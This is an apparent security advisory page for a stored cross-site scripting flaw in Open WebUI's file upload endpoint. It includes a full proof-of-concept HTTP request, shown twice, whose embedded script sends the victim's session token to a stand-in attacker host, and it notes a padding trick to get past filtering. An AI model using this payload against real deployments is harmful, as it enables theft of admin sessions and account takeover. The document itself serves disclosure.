PYSEC-2026-2713

See a problem?
Import Source
https://github.com/pypa/advisory-database/blob/main/vulns/open-webui/PYSEC-2026-2713.yaml
JSON Data
https://api.osv.dev/v1/vulns/PYSEC-2026-2713
Aliases
Published
2026-07-13T15:46:29.140160Z
Modified
2026-07-13T16:32:18.798916650Z
Severity
  • 6.4 (Medium) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N CVSS Calculator
Summary
Open WebUI allows limited stored XSS vila uploaded html file
Details

Summary

Low privileged users can upload HTML files which contain JavaScript code via the /api/v1/files/ backend endpoint. This endpoint returns a file id, which can be used to open the file in the browser and trigger the JavaScript code in the user's browser. Under the default settings, files uploaded by low-privileged users can only be viewed by admins or themselves, limiting the impact of this vulnerability.

Details

The following HTTP request can be sent to the backend server to upload a file with the contents: <script>fetch("https://attacker.com/?token=" + localStorage.getItem("token"))</script>

POST /api/v1/files/ HTTP/1.1
Host: localhost:8080
Content-Length: 286
authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6Ijg2NjA1NTZhLTc0OWQtNDdmNS1iMjgwLWRiYzkyYzc2ZjM1NiJ9.4cImklYQUVi3dlXmRtQwdZKEleu0cq4tXompMod8X2U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryr0PnRBBHKXD9UEdm

------WebKitFormBoundaryr0PnRBBHKXD9UEdm
Content-Disposition: form-data; name="file"; filename="test.html"
Content-Type: text/html



<h1>padding</h1>




<script>fetch("https://attacker.com/?token=" + localStorage.getItem("token"))</script>


------WebKitFormBoundaryr0PnRBBHKXD9UEdm--

Note the filename="test.html" , Content-Type: text/html, and <h1>padding</h> in the request's body. These are important because some form of sanitization or filtering was observed which caused errors when uploading an html file that only conained a <script> tag.

The backend server responds to the above request with JSON data that contains an id parameter.

image

This ID can be used to view the uploaded file in the browser at <Backend_URL>/api/v1/files/<file_id>/content/html

Because of the authorization checks done on lines https://github.com/open-webui/open-webui/blob/main/backend/open_webui/routers/files.py#L434-L438, this file can only be viewed by admins and the user that uploaded it, but not by other low-privileged users, thus limiting the imact of this stored XSS vulnerability.

PoC

First, upload an html containing JavaScript code to the backend server using the following HTTP request:

POST /api/v1/files/ HTTP/1.1
Host: localhost:8080
Content-Length: 286
authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6Ijg2NjA1NTZhLTc0OWQtNDdmNS1iMjgwLWRiYzkyYzc2ZjM1NiJ9.4cImklYQUVi3dlXmRtQwdZKEleu0cq4tXompMod8X2U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryr0PnRBBHKXD9UEdm

------WebKitFormBoundaryr0PnRBBHKXD9UEdm
Content-Disposition: form-data; name="file"; filename="test.html"
Content-Type: text/html



<h1>padding</h1>




<script>fetch("https://attacker.com/?token=" + localStorage.getItem("token"))</script>


------WebKitFormBoundaryr0PnRBBHKXD9UEdm--

Then copy the id from the response and use it to view the file in the browser at <Backend_URL>/api/v1/files/<file_id>/content/html

Impact

Low privileged users can upload HTML files containing malicious JavaScript code. A link to such a file can be sent to an admin, and if clicked, will give the low-privileged user complete control over the admin's account, ultimately enabling RCE via functions, as described in https://github.com/open-webui/open-webui/security/advisories/GHSA-9f4f-jv96-8766

References

Affected packages

PyPI / open-webui

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
0.6.6

Affected versions

0.*
0.1.124
0.1.125
0.2.0
0.2.1
0.2.2
0.2.3
0.2.4
0.2.5
0.3.0
0.3.1
0.3.2
0.3.3
0.3.4
0.3.5
0.3.6
0.3.7
0.3.8
0.3.9
0.3.10
0.3.12
0.3.13
0.3.14
0.3.15
0.3.16
0.3.17.dev2
0.3.17.dev3
0.3.17.dev4
0.3.17.dev5
0.3.17
0.3.18
0.3.19
0.3.20
0.3.21
0.3.22
0.3.23
0.3.24
0.3.25
0.3.26
0.3.27.dev1
0.3.27.dev2
0.3.27.dev3
0.3.27
0.3.28
0.3.29
0.3.30.dev1
0.3.30.dev2
0.3.30
0.3.31.dev1
0.3.31
0.3.32
0.3.33.dev1
0.3.33
0.3.34
0.3.35
0.4.0.dev1
0.4.0.dev2
0.4.0
0.4.1
0.4.2
0.4.3
0.4.4
0.4.5
0.4.6.dev1
0.4.6
0.4.7
0.4.8
0.5.0.dev1
0.5.0.dev2
0.5.0
0.5.1
0.5.2
0.5.3.dev1
0.5.3
0.5.4
0.5.5
0.5.6
0.5.7
0.5.8
0.5.9
0.5.10
0.5.11
0.5.12
0.5.13
0.5.14
0.5.15
0.5.16
0.5.17
0.5.18
0.5.19
0.5.20
0.6.0
0.6.1
0.6.2
0.6.3
0.6.4
0.6.5
0.6.6.dev1

Database specific

source
"https://github.com/pypa/advisory-database/blob/main/vulns/open-webui/PYSEC-2026-2713.yaml"